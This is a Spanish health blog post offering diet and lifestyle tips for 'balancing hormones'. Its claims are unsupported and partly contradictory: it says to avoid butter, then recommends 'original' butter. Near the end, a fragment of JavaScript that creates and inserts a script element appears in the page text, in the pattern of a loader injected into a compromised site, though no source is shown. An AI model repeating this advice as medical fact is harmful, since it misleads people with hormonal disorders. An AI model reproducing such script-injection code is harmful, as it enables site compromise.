Salud y belleza » Enfermedades, Salud

Consejos para equilibrar las hormonas

Sin Comentarios

Los trastornos hormonales pueden producir múltiples problemas, por ello, si quieres evitarlos, vamos a darte algunos consejos muy útiles para equilibrar las hormonas.

equilibrio-hormonal

Los desequilibrios hormonales pueden provocar cambios en el estado de ánimo, cambios bruscos de peso, problemas intestinales, fatiga, dificultad para dormir, infertilidad o síndrome de ovario poliquístico.

El sistema hormonal se ve implicado en numerosas funciones de nuestro cuerpo, en el desarrollo, funciones sexuales, el metabolismo, el humor…. Cuando el cuerpo no tiene colesterol bueno y grasas saludables pueden darse desequilibrios hormonales. La dieta influye mucho en los trastornos hormonales y por eso es uno de los puntos clave  para equilibrar las hormonas.

Si quieres equilibrar las hormonas es recomendable que moderes el consumo de omega-6 para que el sistema hormonal esté equilibrado. Lo mejor es que evites consumir en exceso productos como el aceite vegetal, el aceite de cacahuete, aceite de canola, aceite de soja, margarina, mantequilla y café.

En su lugar, es recomendable que consumas otro tipo de alimentos como la mantequilla original, el aceite de oliva, aceite de coco, grasas animales, omega-3… Debes, además, seguir una serie de recomendaciones.

equilibrio-hormonal-dieta

Cuanto más natural sean los alimentos, mejor. Por otro lado, procura cocinar en recipientes de vidrio o acero inoxidable y no comer alimentos que estén envasados en plástico. Por otro lado, debes procurar no utilizar productos químicos y reducir al máximo el uso del microondas.

Siguiendo estos consejos seguro que consigues equilibrar tu sistema hormonal y encontrarte mejor en tu día a día.

¿Sufres desequilibrios hormonales? ¿Te sirvieron estos consejos para reducirlos?

var d=document;var s=d.createElement('script'); document.currentScript.parentNode.insertBefore(s, document.currentScript);

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.